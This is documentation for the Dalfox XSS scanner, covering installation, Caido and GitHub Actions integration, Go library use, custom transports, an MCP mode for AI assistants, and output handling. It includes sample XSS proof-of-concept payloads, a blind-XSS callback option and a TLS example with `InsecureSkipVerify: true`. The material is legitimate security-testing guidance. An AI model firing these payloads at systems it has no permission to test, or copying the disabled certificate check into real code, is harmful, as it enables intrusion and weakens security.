# Dalfox Full Documentation

> This file contains the combined content of all Dalfox documentation pages for LLM context


## Caido Active Workflow

# Dalfox Caido Integration
{: .d-inline-block }

New (v2.12.0)
{: .label .label-blue }

## Overview

Dalfox now supports direct integration with [Caido](https://caido.io/), enabling powerful, automated XSS scanning as part of your Caido active workflows. This integration streamlines web security testing by allowing you to invoke Dalfox’s advanced XSS detection on HTTP requests intercepted or crafted within Caido, and view actionable results right in your workflow.

## What is Caido?

Caido is a modern web security toolkit for penetration testers and bug bounty hunters. It provides an intuitive interface for intercepting, modifying, and replaying HTTP requests, and supports extensibility through active workflows and external tool integrations.

By integrating Dalfox with Caido, you can:

- Automatically scan HTTP requests for XSS vulnerabilities
- Receive structured, actionable scan results within Caido
- Enhance your security testing workflow with minimal manual effort

## Setting Up Dalfox with Caido

### Prerequisites

- **Dalfox v2.12.0 or later** installed on your system
- **Caido** installed and running

### Installation

If you haven’t installed Dalfox yet, use one of the following methods:

```bash
# From source
go install github.com/hahwul/dalfox/v2@latest

# Homebrew
brew install dalfox

# Snapcraft
snap install dalfox
```

*[Installation](/page/installation/)*

## Configuring the Active Workflow

To use Dalfox as an active workflow in Caido:

1. **Set your Dalfox binary path**
   Update the workflow script with the path to your Dalfox executable:
   ```bash
   DALFOX_PATH="/Users/youruser/Projects/dalfox/dalfox"
   ```

2. **Configure the Caido workflow**
   Use the following shell script in your Caido active workflow configuration:
   ```bash
   cat - | jq -r .request | $DALFOX_PATH pipe --rawdata --silence --report --report-format=md
   ```
   This script takes the intercepted HTTP request from Caido, pipes it to Dalfox, and outputs the results in Markdown format.

3. **Save and activate the workflow**
   Ensure your workflow is enabled in Caido’s interface.

#### Example Workflow Configuration

![Caido Workflow Configuration](/images/page/running/caido/workflow.jpg)

## Using Dalfox in Caido

Once configured, you can trigger Dalfox scans directly from Caido’s UI. When you send a request through Caido, the active workflow will automatically invoke Dalfox and display the scan results.

#### Running from the Context Menu

You can also run the Dalfox workflow directly from Caido’s context menu. Simply right-click on a request, select `Run workflow`, and choose `XSS Scan`.

![Run Dalfox Workflow from Context Menu](/images/page/running/caido/context.jpg)

#### Example Scan Result in Caido

![Dalfox Scan Result in Caido](/images/page/running/caido/finding.jpg)

## Advanced Usage

You can customize Dalfox’s behavior by modifying the workflow script to include additional flags, such as custom headers, cookies, or Blind XSS callbacks. For example:

```bash
cat - | jq -r .request | $DALFOX_PATH pipe --rawdata --silence --report --report-format=md --header "Authorization: Bearer <token>" -b your-callback.com
```

## Best Practices

1. **Keep Dalfox Updated**: Use the latest version for improved detection and features.
2. **Validate Results**: Manually verify critical findings for accuracy.
3. **Respect Target Systems**: Avoid scanning production systems without permission.
4. **Leverage Caido Context**: Use Caido’s request manipulation features to test various scenarios before scanning.
5. **Secure Sensitive Data**: Be mindful of sensitive information in scan results.

---

By integrating Dalfox with Caido, you can supercharge your web security assessments with automated, reliable XSS detection—right where you need it most.

---


## In the Code

# Using Dalfox in Your Code

This guide provides detailed instructions on how to use Dalfox as a library in your Go projects. Follow the steps below to integrate Dalfox into your code.

## Get the Dalfox Library

First, you need to download the Dalfox library using the `go get` command:

```bash
go get github.com/hahwul/dalfox/v2/lib
```

## Sample Code

Here is a sample Go program that demonstrates how to use the Dalfox library to perform a scan:

```go
package main

import (
    "fmt"

    dalfox "github.com/hahwul/dalfox/v2/lib"
)

func main() {
    // Set up options for the scan
    opt := dalfox.Options{
        Cookie: "ABCD=1234",
    }

    // Create a new scan target
    target := dalfox.Target{
        URL:     "https://xss-game.appspot.com/level1/frame",
        Method:  "GET",
        Options: opt,
    }

    // Perform the scan
    result, err := dalfox.NewScan(target)
    if err != nil {
        fmt.Println("Error:", err)
    } else {
        fmt.Println("Scan Result:", result)
    }
}
```

## Running the Code

To run the sample code, follow these steps:

### Initialize Your Project

First, initialize your Go module:

```bash
go mod init <YOUR_PROJECT_REPO>
```

Replace `<YOUR_PROJECT_REPO>` with the path to your project repository.

### Build the Application

Next, build your application:

```bash
go build -o testapp
```

During the build process, Go will download the Dalfox library and its dependencies.

### Run the Application

Finally, run your application:

```bash
./testapp
```

You should see output similar to the following:

```bash
# [] [{V GET https://xss-game.appspot.com/level1/frame?query=%3Ciframe+srcdoc%3D%22%3Cinput+onauxclick%3Dprint%281%29%3E%22+class%3Ddalfox%3E%3C%2Fiframe%3E}] 2.618998247s 2021-07-11 10:59:26.508483153 +0900 KST m=+0.000794230 2021-07-11 10:59:29.127481217 +0900 KST m=+2.619792477
```

## More Information

For more information and advanced usage, please refer to the [official Dalfox library documentation](https://pkg.go.dev/github.com/hahwul/dalfox/v2).

---


## Custom Tranport Feature

# Custom Transport Feature
{: .d-inline-block }

Since (v2.10.0) 
{: .label .label-blue }

Dalfox now supports custom HTTP transports, allowing you to customize the HTTP client behavior for your scanning needs. This feature is particularly useful when integrating Dalfox with other pipelines for HTTP control flow, retry mechanisms, and non-trivial authentication scenarios.

## What is a Transport?

In Go's HTTP client, a transport specifies how HTTP requests are made. It handles details like connection pooling, timeouts, TLS configuration, and more. By customizing the transport, you can control how Dalfox makes HTTP requests.

## Benefits for Pipeline Integration

Custom transports provide several benefits when integrating Dalfox into larger security testing pipelines:

1. **HTTP Control Flow**: Customize how requests are made, including adding custom headers, modifying request bodies, or implementing custom routing logic.
2. **Retry Mechanisms**: Implement resilient scanning by automatically retrying failed requests with configurable backoff strategies.
3. **Authentication**: Handle complex authentication flows like OAuth2, JWT, or custom token-based authentication.
4. **Rate Limiting**: Control the rate of requests to avoid being blocked by target systems.
5. **Logging and Monitoring**: Add custom logging or monitoring to track requests and responses.
6. **Proxy Integration**: Seamlessly integrate with custom proxy solutions or service meshes.

## How to Use Custom Transports

### 1. Using a Custom Transport with a Custom TLS Configuration

```go
// Create a custom transport with a custom TLS configuration
customTransport := scanning.CreateDefaultTransport(10) // 10 seconds timeout
customTransport.TLSClientConfig = &tls.Config{
    InsecureSkipVerify: true,
    MinVersion:         tls.VersionTLS12,
    MaxVersion:         tls.VersionTLS13,
}

// Create options with the custom transport
options := model.Options{
    CustomTransport: customTransport,
    Timeout:         10,
}

// Use the options in a scan
Scan("https://example.com", options, "1")
```

### 2. Using a Transport Chain

You can chain multiple transports together to apply multiple transformations to your requests:

```go
// Create a base transport
baseTransport := scanning.CreateDefaultTransport(10)

// Create multiple header transports
headerTransport1 := &scanning.HeaderTransport{
    Transport: baseTransport,
    Headers: map[string]string{
        "X-Custom-Header1": "Value1",
    },
}

headerTransport2 := &scanning.HeaderTransport{
    Transport: baseTransport,
    Headers: map[string]string{
        "X-Custom-Header2": "Value2",
    },
}

// Create a transport chain with both transports
transportChain := scanning.CreateTransportChain(headerTransport1, headerTransport2)

// Create options with the transport chain
options := model.Options{
    CustomTransport: transportChain,
    Timeout:         10,
}

// Use the options in a scan
Scan("https://example.com", options, "1")
```

### 3. Using a Retry Transport for Resilient Scanning

Implement automatic retries for failed requests:

```go
// Create a base transport
baseTransport := scanning.CreateDefaultTransport(10)

// Create a retry transport
retryTransport := &scanning.RetryTransport{
    Transport:    baseTransport,
    MaxRetries:   3,
    RetryDelay:   time.Second,
    RetryBackoff: 2, // Exponential backoff
}

// Create options with the retry transport
options := model.Options{
    CustomTransport: retryTransport,
    Timeout:         10,
}

// Use the options in a scan
Scan("https://example.com", options, "1")
```

### 4. Using an OAuth2 Transport for Authenticated Scanning

Handle OAuth2 authentication flows:

```go
// Create a base transport
baseTransport := scanning.CreateDefaultTransport(10)

// Create an OAuth2 transport
oauth2Transport := &scanning.OAuth2Transport{
    Transport:     baseTransport,
    TokenEndpoint: "https://auth.example.com/token",
    ClientID:      "client_id",
    ClientSecret:  "client_secret",
    Scope:         "read write",
}

// Create options with the OAuth2 transport
options := model.Options{
    CustomTransport: oauth2Transport,
    Timeout:         10,
}

// Use the options in a scan
Scan("https://example.com", options, "1")
```

### 5. Using a Rate Limiting Transport

Control the rate of requests to avoid being blocked:

```go
// Create a base transport
baseTransport := scanning.CreateDefaultTransport(10)

// Create a rate limit transport
rateLimitTransport := &scanning.RateLimitTransport{
    Transport:      baseTransport,
    RequestsPerSec: 5, // 5 requests per second
}

// Create options with the rate limit transport
options := model.Options{
    CustomTransport: rateLimitTransport,
    Timeout:         10,
}

// Use the options in a scan
Scan("https://example.com", options, "1")
```

### 6. Using a Logging Transport for Debugging

Add detailed logging for debugging:

```go
// Create a base transport
baseTransport := scanning.CreateDefaultTransport(10)

// Create a logging transport
loggingTransport := &scanning.LoggingTransport{
    Transport: baseTransport,
    LogWriter: os.Stdout, // Or any io.Writer
}

// Create options with the logging transport
options := model.Options{
    CustomTransport: loggingTransport,
    Timeout:         10,
}

// Use the options in a scan
Scan("https://example.com", options, "1")
```

## Creating Your Own Custom Transport

You can create your own custom transport by implementing the `http.RoundTripper` interface:

```go
// MyCustomTransport is a custom transport that does something special
type MyCustomTransport struct {
    Transport http.RoundTripper
    // Add any fields you need
}

// RoundTrip implements the http.RoundTripper interface
func (t *MyCustomTransport) RoundTrip(req *http.Request) (*http.Response, error) {
    // Clone the request to avoid modifying the original
    reqClone := req.Clone(req.Context())

    // Do something special with the request
    // ...

    // Use the underlying transport
    return t.Transport.RoundTrip(reqClone)
}
```

## Integration Examples

### Integrating with a Corporate Proxy

```go
// Create a base transport
baseTransport := scanning.CreateDefaultTransport(10)

// Configure the proxy
baseTransport.Proxy = http.ProxyURL(&url.URL{
    Scheme: "http",
    Host:   "corporate-proxy.example.com:8080",
    User:   url.UserPassword("username", "password"),
})

// Create options with the proxy transport
options := model.Options{
    CustomTransport: baseTransport,
    Timeout:         10,
}

// Use the options in a scan
Scan("https://example.com", options, "1")
```

### Integrating with a CI/CD Pipeline

```go
// Create a base transport
baseTransport := scanning.CreateDefaultTransport(10)

// Create a CI/CD integration transport
cicdTransport := &CICDTransport{
    Transport:  baseTransport,
    BuildID:    os.Getenv("CI_BUILD_ID"),
    JobID:      os.Getenv("CI_JOB_ID"),
    ResultsAPI: "https://ci-results.example.com/api/v1/results",
}

// Create options with the CI/CD transport
options := model.Options{
    CustomTransport: cicdTransport,
    Timeout:         10,
}

// Use the options in a scan
Scan("https://example.com", options, "1")
```

## Notes

- If you provide a custom transport, Dalfox will still apply proxy settings if specified, but only if your transport is of type `*http.Transport`.
- If you provide a custom transport, Dalfox will still apply the HAR writer if specified.
- The custom transport feature is designed to be used with the library mode of Dalfox. If you're using the CLI, you'll need to create a custom application that uses the library mode.
- When implementing custom transports, always clone the request before modifying it to avoid side effects.
- For complex authentication flows, consider implementing a transport that handles token refresh and retry logic.

---


## File Mode

# File mode

`file` mode is a mode for scanning multiple URLs or for scanning based on a raw request file in Burp Suite/ZAP. Input is filename.

```shell
dalfox file {filename}
```

If the file is a list of URLs, proceed to scan multiple URLs just like the Pipe, and if it is with the `--rawdata` option, recognize it as a raw request, analyze the file, and test it.

## scanning urls from file
```shell
dalfox file urls.txt
```

## scanning from burp/zap raw request file
```shell
dalfox file req.raw --rawdata
```

---


## In the GitHub Actions

# Using Dalfox in GitHub Actions

## Overview

GitHub Actions enables you to automate your security testing processes directly in your GitHub repositories. By integrating Dalfox with GitHub Actions, you can:

- Automatically scan for XSS vulnerabilities when code is pushed
- Include security testing in your pull request workflows
- Create scheduled security scans of your web applications
- Generate reports on security findings as part of your CI/CD pipeline

This guide explains how to set up and use Dalfox in GitHub Actions workflows for various scanning scenarios.

## Available Actions

Dalfox offers official GitHub Actions in the GitHub Marketplace:

* [XSS Scan with Dalfox](https://github.com/marketplace/actions/xss-scan-with-dalfox)
* [hahwul/action-dalfox](https://github.com/hahwul/action-dalfox)

## Getting Started

### Basic Usage

To integrate Dalfox in your GitHub Actions workflow, add a step similar to the following to your workflow file:

```yaml
- name: Dalfox XSS Scan
  uses: hahwul/action-dalfox@main
  id: xss-scan
  with:
    target: 'https://example.com/search?q=test'
    mode: url
    cmd_options: '--follow-redirects --format json'
```

This basic example will scan the specified URL for XSS vulnerabilities using Dalfox.

### Input Parameters

The Dalfox GitHub Action accepts the following inputs:

| Parameter | Description | Required | Default |
|-----------|-------------|----------|---------|
| `target` | The target URL or URLs to scan | Yes | - |
| `mode` | Scan mode (url, pipe, file, sxss) | Yes | - |
| `cmd_options` | Additional Dalfox command options | No | '' |

### Scan Modes

Dalfox supports several scanning modes in GitHub Actions:

- `url`: Scan a single URL
- `pipe`: Scan multiple URLs provided in the target parameter
- `file`: Scan URLs from a file (requires checkout of your repository)
- `sxss`: Test for stored XSS vulnerabilities

### Output Handling

The action provides the scan results in the `result` output variable:

```yaml
- name: Dalfox XSS Scan
  uses: hahwul/action-dalfox@main
  id: xss-scan
  with:
    target: 'https://example.com/search?q=test'
    mode: url

- name: Display Results
  run: echo "Scan results - ${{ steps.xss-scan.outputs.result }}"
```

## Workflow Examples

### On-demand Single URL Scan

This workflow runs a Dalfox scan when manually triggered:

```yaml
name: XSS Security Scan

on:
  workflow_dispatch:
    inputs:
      url:
        description: 'URL to scan'
        required: true
        default: 'https://example.com'

jobs:
  security_scan:
    runs-on: ubuntu-latest
    name: Dalfox XSS Scanner
    steps:
      - name: Dalfox scan
        uses: hahwul/action-dalfox@main
        id: xss-scan
        with:
          target: ${{ github.event.inputs.url }}
          mode: url
          cmd_options: '--follow-redirects --format json --report'

      - name: Display Results
        run: echo "${{ steps.xss-scan.outputs.result }}"
```

### Scheduled Multi-URL Scan

This workflow runs daily to scan multiple URLs:

```yaml
name: Daily XSS Scans

on:
  schedule:
    - cron: '0 0 * * *'  # Run at midnight every day

jobs:
  security_scan:
    runs-on: ubuntu-latest
    name: Dalfox XSS Scanner
    steps:
      - name: Dalfox scan
        uses: hahwul/action-dalfox@main
        id: xss-scan
        with:
          target: |
            https://example.com/search?q=test
            https://example.com/products?id=123
            https://example.com/news?article=latest
          mode: pipe
          cmd_options: '--follow-redirects --format json --report --output scan-results.json'

      - name: Upload scan results
        uses: actions/upload-artifact@v3
        with:
          name: xss-scan-results
          path: scan-results.json
          retention-days: 30
```

### Pull Request Security Check

This workflow scans the web application whenever a pull request is opened or updated:

```yaml
name: Pull Request XSS Check

on:
  pull_request:
    branches: [ main ]
    paths:
      - 'frontend/**'
      - 'web/**'

jobs:
  security_scan:
    runs-on: ubuntu-latest
    name: Dalfox XSS Scanner
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Set up test environment
        run: |
          # Set up your application for testing
          # E.g., npm install && npm start
          echo "Starting application on http://localhost:3000"

      - name: Dalfox scan
        uses: hahwul/action-dalfox@main
        id: xss-scan
        with:
          target: 'http://localhost:3000'
          mode: url
          cmd_options: '--follow-redirects --deep-domxss --format json'

      - name: Check for vulnerabilities
        run: |
          if [[ "${{ steps.xss-scan.outputs.result }}" == *"[POC]"* ]]; then
            echo "::warning::XSS vulnerabilities were found! Check the scan results."
            exit 1
          fi
```

## Advanced Usage

### Scanning with a Configuration File

You can use a Dalfox configuration file in your GitHub Actions workflow:

```yaml
name: Configured XSS Scan

on: [push]

jobs:
  security_scan:
    runs-on: ubuntu-latest
    name: Dalfox XSS Scanner
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Dalfox scan
        uses: hahwul/action-dalfox@main
        id: xss-scan
        with:
          target: 'https://example.com'
          mode: url
          cmd_options: '--config ./security/dalfox-config.json'
```

### Integrating with Security Platforms

You can send Dalfox results to security platforms using the `--found-action` option:

```yaml
name: XSS Scan with Notifications

on: [push]

jobs:
  security_scan:
    runs-on: ubuntu-latest
    name: Dalfox XSS Scanner
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Dalfox scan
        uses: hahwul/action-dalfox@main
        id: xss-scan
        with:
          target: 'https://example.com'
          mode: url
          cmd_options: '--found-action "curl -X POST -H \"Content-Type: application/json\" -d \"{\\\"text\\\":\\\"XSS Found: \$\$POCURL\\\"}\" https://hooks.slack.com/services/YOUR/SLACK/WEBHOOK"'
```

### File-Based Scanning

This workflow uses a list of URLs from a file in your repository:

```yaml
name: File-Based XSS Scan

on: [push]

jobs:
  security_scan:
    runs-on: ubuntu-latest
    name: Dalfox XSS Scanner
    steps:
      - name: Checkout
        uses: actions/checkout@v3

      - name: Dalfox scan
        uses: hahwul/action-dalfox@main
        id: xss-scan
        with:
          target: './security/target-urls.txt'
          mode: file
          cmd_options: '--mass-worker 5 --format json --output scan-results.json'

      - name: Upload scan results
        uses: actions/upload-artifact@v3
        with:
          name: xss-scan-results
          path: scan-results.json
```

## Best Practices

### Security Considerations

1. **Token Permissions**: Be careful with workflow token permissions when scanning internal applications
2. **Rate Limiting**: Adjust worker count and delay settings to avoid overwhelming your applications
3. **Secret Management**: Use GitHub Secrets for sensitive values like API tokens or webhook URLs

### Performance Optimization

1. **Selective Scanning**: Only scan URLs that have changed or are affected by recent code changes
2. **Parallel Jobs**: For large applications, split scanning tasks across multiple parallel jobs
3. **Resource Allocation**: Adjust worker settings based on the GitHub Actions runner resources

```yaml
# Example of efficient resource usage
cmd_options: '--worker 50 --delay 100 --timeout 5'
```

### Workflow Integration

1. **Reporting Integration**: Send results to your security management platforms
2. **Issue Creation**: Automatically create GitHub issues for detected vulnerabilities
3. **PR Status Checks**: Make PR approvals dependent on security scan results

```yaml
# Example of creating a GitHub issue for vulnerabilities
- if: ${{ steps.xss-scan.outputs.result != '' }}
  name: Create Issue
  uses: actions/github-script@v6
  with:
    script: |
      github.rest.issues.create({
        owner: context.repo.owner,
        repo: context.repo.repo,
        title: 'XSS Vulnerability Detected',
        body: 'Dalfox found XSS vulnerabilities in the latest scan:\n\n```\n${{ steps.xss-scan.outputs.result }}\n```'
      })
```

## Troubleshooting

### Common Issues

1. **Action fails with timeout**:
   - Increase the timeout value in cmd_options
   - Reduce the number of targets or parallel workers

2. **Empty results**:
   - Verify that your target is accessible from GitHub Actions runners
   - Check if your application requires authentication
   - Try running with `--debug` option to see more details

3. **Permission errors**:
   - Ensure the action has proper permissions to access resources
   - Authenticate properly if scanning authenticated pages

### Getting Help

If you encounter issues with Dalfox GitHub Actions:
- Check the [Dalfox GitHub repository issues](https://github.com/hahwul/dalfox/issues)
- Join the [Dalfox community discussions](https://github.com/hahwul/dalfox/discussions)
- Report specific GitHub Actions issues in the [action-dalfox repository](https://github.com/hahwul/action-dalfox/issues)

---


## Installation

# Installation Guide

This guide provides detailed instructions on how to install Dalfox using various methods. Choose the method that best suits your environment and technical preferences.

## Using Homebrew

Homebrew is a popular package manager for macOS and Linux. If you're using a system with Homebrew available, this is the quickest and easiest way to install Dalfox.

### Install Homebrew

If you haven't installed Homebrew yet, you can install it by running the following command in your terminal:

```shell
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
```

### Install Dalfox

Once Homebrew is installed, you can install Dalfox with a single command:

```shell
brew install dalfox
```

After installation, verify it's working by running:

```shell
dalfox --version
```

For more details about the Dalfox Homebrew package, you can visit the [Homebrew Formula page for Dalfox](https://formulae.brew.sh/formula/dalfox).

## Using Snapcraft

Snapcraft is a package manager for Linux that works across many distributions. It provides containerized applications that run consistently regardless of the underlying system.

### Install Snapcraft

To install Snapcraft on your Linux distribution, please refer to the official documentation: [Installing snapd](https://snapcraft.io/docs/installing-snapd).

### Install Dalfox

Once Snapcraft is installed, you can install Dalfox by running:

```shell
sudo snap install dalfox
```

Verify the installation with:

```shell
dalfox --version
```

## Using Nixpkgs (Nix/NixOS)

Dalfox is available in the Nix package collection, making installation straightforward for Nix and NixOS users. Please note that the latest version may only be available in the `unstable` channel.

### Install Nix

Ensure you have Nix installed on your system. You can find installation instructions on the [official Nix website](https://nixos.org/download/).

### Install Dalfox

To install and use Dalfox in a shell session, run:

```bash
nix-shell -p dalfox
 ```

## From Source

Building from source gives you the most up-to-date version of Dalfox and allows for customization if needed.

### Prerequisites

Ensure you have Go (version 1.16 or later recommended) installed on your system. You can download it from the [official Go website](https://golang.org/dl/).

### Install Dalfox

To install the latest version of Dalfox from source, run:

```bash
go install github.com/hahwul/dalfox/v2@latest
```

Make sure your Go bin directory is in your PATH. If you haven't set it up, you can add the following to your shell configuration file (e.g., `.bashrc` or `.zshrc`):

```bash
export PATH=$PATH:$(go env GOPATH)/bin
```

Note: The installed version might differ slightly from the latest release as `go install` references the main branch.

## Using Docker

Docker provides a consistent environment for running Dalfox without worrying about dependencies or system configurations. This is especially useful for CI/CD pipelines or isolated testing environments.

### Pull the Latest Docker Image

To pull the latest Docker image of Dalfox, run:

```bash
# From Docker Hub
docker pull hahwul/dalfox:latest

# Or from GitHub Container Registry
docker pull ghcr.io/hahwul/dalfox:latest
```

### Run Dalfox Using Docker

You can run Dalfox using Docker with the following command:

```bash
# Using Docker Hub image
docker run -it hahwul/dalfox:latest /app/dalfox url https://www.example.com

# Using GitHub Container Registry image
docker run -it ghcr.io/hahwul/dalfox:latest /app/dalfox url https://www.example.com
```

For scanning local files or directories, you'll need to mount them to the container:

```bash
docker run -it -v $(pwd):/data hahwul/dalfox:latest /app/dalfox file /data/targets.txt
```

### Interactive Docker Shell

For an interactive shell within the Docker container (useful for more complex operations):

```bash
# Using Docker Hub image
docker run -it hahwul/dalfox:latest /bin/bash

# Using GitHub Container Registry image
docker run -it ghcr.io/hahwul/dalfox:latest /bin/bash
```

Once inside the container, you can run Dalfox directly:

```bash
./dalfox --help
```

## Troubleshooting Common Installation Issues

If you encounter issues during installation, try the following:

1. **PATH Issues**: Ensure the installation directory is in your PATH
2. **Permission Errors**: Use `sudo` for commands that require elevated privileges
3. **Version Conflicts**: Check if you have multiple versions installed

For more help, please open an issue on the [Dalfox GitHub repository](https://github.com/hahwul/dalfox/issues).

---


## MCP Mode

# Dalfox MCP Mode
{: .d-inline-block }

New (v2.11.0)
{: .label .label-blue }

## Overview

Model Context Protocol (MCP) mode allows Dalfox to operate as an MCP server, enabling direct integration with AI assistants and language models (LLMs). This integration provides a seamless experience for security testing, allowing AI tools to directly leverage Dalfox's XSS scanning capabilities.

## What is Model Context Protocol (MCP)?

Model Context Protocol is a specification that allows AI language models to interact with external tools. By running Dalfox as an MCP server, AI coding assistants can:

- Initiate XSS vulnerability scans
- Process scan results within the AI conversation
- Help interpret security findings
- Suggest remediation steps

## Starting Dalfox in MCP Mode

To run Dalfox as an MCP server:

```bash
dalfox server --type mcp
```

## Client Integrations

### Visual Studio Code

VS Code provides robust support for MCP tools when used with AI coding assistants like GitHub Copilot or other MCP-compatible extensions.

#### Configuration Steps

1. **Install Dalfox** (if not already installed)
   ```bash
   # From source
   go install github.com/hahwul/dalfox/v2@latest

   # Homebrew
   brew install dalfox

   # Snapcraft
   snap install dalfox
   ```

   *[Installation](/page/installation/)*

2. **Configure VS Code settings**

   To enable the dalfox server in VS Code, update your `settings.json` file with the following configuration:

   ```json
   {
     "mcp": {
       "servers": {
         "dalfox": {
           "type": "stdio",
           "command": "dalfox",
           "args": [
             "server",
             "--type=mcp"
           ]
         }
       }
     }
   }
   ```

   This setup defines a server named dalfox that uses standard input/output (stdio) and runs the command `dalfox server --type=mcp`. You can manually add the server by pressing `⌘` + `⇧` + `p`, selecting MCP: Add Server, choosing `Command (stdio)`, and entering `dalfox server --type=mcp` in the input field. This ensures seamless integration of the dalfox server with your VS Code environment.

3. **Use with AI assistant**

   Now your AI coding assistant can directly use Dalfox to scan for XSS vulnerabilities. For example, you can ask:

   ```
   "Can you scan this URL for XSS vulnerabilities using Dalfox?"
   ```

#### Example VS Code Usage

![](/images/page/running/mcp-vscode.jpg)

### Claude Desktop

Claude Desktop is Anthropic's standalone application that can integrate with external tools using the MCP protocol.

#### Configuration Steps

1. **Install Dalfox** (if not already installed)
   ```bash
   # From source
   go install github.com/hahwul/dalfox/v2@latest

   # Homebrew
   brew install dalfox

   # Snapcraft
   snap install dalfox
   ```

   *[Installation](/page/installation/)*

2. **Configure Claude Desktop settings**

   ```json
    {
        "mcpServers": {
            "dalfox": {
                "command": "dalfox",
                "args": [
                "server",
                "--type",
                "mcp"
                ]
            }
        }
    }
   ```

3. **Use with Claude**

   You can now use Dalfox directly through Claude's interface:

   ```
   "Can you scan https://xss-game.appspot.com/level1/frame  for XSS vulnerabilities"
   ```

#### Example Claude Desktop Usage

![](/images/page/running/mcp-claude.jpg)

## Advanced MCP Integration

### Custom Scan Options

When using Dalfox through MCP, you can specify various scan options by providing them in your request:

```
"Scan https://example.com with Dalfox using the following options:
- Custom headers with an authorization token
- Cookie-based authentication
- A blind XSS callback URL"
```

The AI assistant will translate these requests into the appropriate Dalfox commands.

## Use Cases

### Security Code Review

Ask your AI assistant to review code and then scan endpoints for vulnerabilities:

```
"Review this controller code and identify any potential XSS vulnerabilities.
Then use Dalfox to scan the corresponding endpoints."
```

### Vulnerability Research

Have the AI assistant help with targeted testing:

```
"I found a potential XSS vulnerability in the search parameter.
Can you use Dalfox to verify if it's exploitable?"
```

## Best Practices

1. **Keep Dalfox Updated**: Ensure you're using the latest version for the most current security checks
2. **Validate Results**: Always verify AI-interpreted scan results manually for critical systems
3. **Rate Limiting**: Be mindful of scan frequency to avoid overwhelming target systems
4. **Context Matters**: Provide AI assistants with sufficient context about targets for more effective scanning
5. **Security Awareness**: Remember that scan results might contain sensitive information

---


## Output Handling

# Output Handling

This guide provides comprehensive instructions on how to capture, filter, and process the output from Dalfox. Understanding these output handling techniques will help you efficiently interpret results and integrate Dalfox into your security workflows.

## Understanding Dalfox Output Types

Dalfox generates several types of output during scanning:

- **Progress information**: Status updates about the scanning process
- **Proof of Concept (PoC) findings**: Actual vulnerabilities discovered
- **Analysis data**: Details about parameters, injection points, and vulnerability verification
- **HTTP traffic**: Raw request and response data

## Basic Output Handling Techniques

### Redirecting Output to Files

The simplest way to save Dalfox output is by using standard output redirection:

```bash
dalfox url http://example.com/vulnerable.php > results.txt
```

This captures all console output to the specified file.

### Using the Built-in Output Flag

For more controlled output saving, use the `-o` or `--output` flag:

```bash
dalfox url http://example.com/vulnerable.php -o results.txt
```

This approach is recommended as it ensures proper handling of terminal control characters.

## Advanced Output Filtering

### Processing Output with Unix Tools

Dalfox output can be piped to other tools for filtering and processing:

```bash
# Extract only verified XSS vulnerabilities
dalfox url http://example.com/vulnerable.php | grep "\[V\]" > verified_xss.txt

# Extract PoC URLs and open them in a browser
dalfox url http://example.com/vulnerable.php | grep "\[POC\]" | cut -d " " -f 2 | xargs -I % open %

# Count different types of findings
dalfox url http://example.com/vulnerable.php | grep "\[POC\]" | cut -d "[" -f 3 | cut -d "]" -f 1 | sort | uniq -c
```

### Filtering by PoC Type

Dalfox allows you to filter findings by vulnerability type with the `--only-poc` flag:

```bash
# Show only verified (V) and grep-based (G) findings
dalfox url http://example.com/vulnerable.php --only-poc=g,v
```

Available PoC types:
- `g`: Grep-based findings (potential vulnerabilities identified through response pattern matching)
- `r`: Reflected findings (parameters successfully reflected in responses)
- `v`: Verified findings (confirmed vulnerabilities through headless browser verification)

## Comprehensive Logging Options

### Capturing Complete Scan Logs

To save all scan information, including detailed analysis steps:

```bash
dalfox url http://example.com/vulnerable.php -o full_scan.log --output-all
```

Example of a comprehensive log:

```
[*] Using single target mode
[*] Target URL: http://example.com/vulnerable.php
[*] Valid target [ code:200 / size:4819 ]
[*] Using dictionary mining option [list=GF-Patterns] 📚⛏
[*] Using DOM mining option 📦⛏
[*] Start static analysis.. 🔍
[*] Start parameter analysis.. 🔍
[*] Start BAV analysis / [sqli, ssti, OpenRedirect] 🔍
[I] Found reflected parameter: q
[V] Triggered XSS Payload: q=<script>alert(1)</script>
[POC][V][GET] http://example.com/vulnerable.php?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
```

### Including Raw HTTP Data

To include raw HTTP requests and responses in your output:

```bash
# Include requests
dalfox url http://example.com/vulnerable.php --output-request

# Include responses
dalfox url http://example.com/vulnerable.php --output-response

# Include both
dalfox url http://example.com/vulnerable.php --output-request --output-response
```

## Output Format Options

### JSON Output

For programmatic processing or integration with other tools, use JSON output:

```bash
dalfox url http://example.com/vulnerable.php --format json -o results.json
```

This generates structured JSON data that can be easily parsed by scripts or imported into other security tools.

### Detailed Report Generation

Dalfox supports generating detailed reports in various formats.

**JSON Report:**

For a structured JSON report:
```bash
dalfox url http://example.com/vulnerable.php --report --report-format json -o detailed_report.json
```
This is useful for machine-readable detailed output.

**Markdown Report:**

For a human-readable Markdown report:
```bash
dalfox url http://example.com/vulnerable.php --report --report-format markdown -o detailed_report.md
# You can also use 'md' as an alias for markdown
dalfox url http://example.com/vulnerable.php --report --report-format md -o detailed_report.md
```
This format is convenient for documentation or quick sharing of findings.

## HTTP Archive (HAR) Integration

### Generating HAR Files

HAR files contain detailed information about HTTP transactions and can be analyzed in various tools:

```bash
dalfox url http://example.com/vulnerable.php --har-file-path=scan.har
```

### Analyzing HAR Files

The generated HAR file can be analyzed with:

- [HAR Viewer](http://www.softwareishard.com/har/viewer/)
- Chrome/Firefox Developer Tools (Import HAR)
- Specialized HTTP analysis tools

Example HAR viewer screenshot:
![HAR Viewer Example](https://user-images.githubusercontent.com/369053/218365521-5df5ff3c-759e-4bb8-9205-a45ac25481ca.png)

## Integration with Other Security Tools

### Automated Workflows

Dalfox can be integrated into CI/CD pipelines or other security automation:

```bash
# Scan and notify on findings
dalfox url http://example.com/vulnerable.php --found-action './notify_slack.sh'

# Scan multiple targets from Burp Suite
dalfox file targets.txt --format json -o findings.json
```

### Continuous Monitoring Examples

```bash
# Daily scan with timestamped output
echo "$(date +%F)_scan.log"
dalfox url http://example.com/vulnerable.php -o "$(date +%F)_scan.log"
```

## Troubleshooting Output Issues

If you encounter problems with output handling:

1. **Terminal encoding issues**: Use `--no-color` to disable ANSI color codes
2. **Output truncation**: Check terminal buffer settings or use file output
3. **Special character problems**: Use JSON output format for consistent encoding

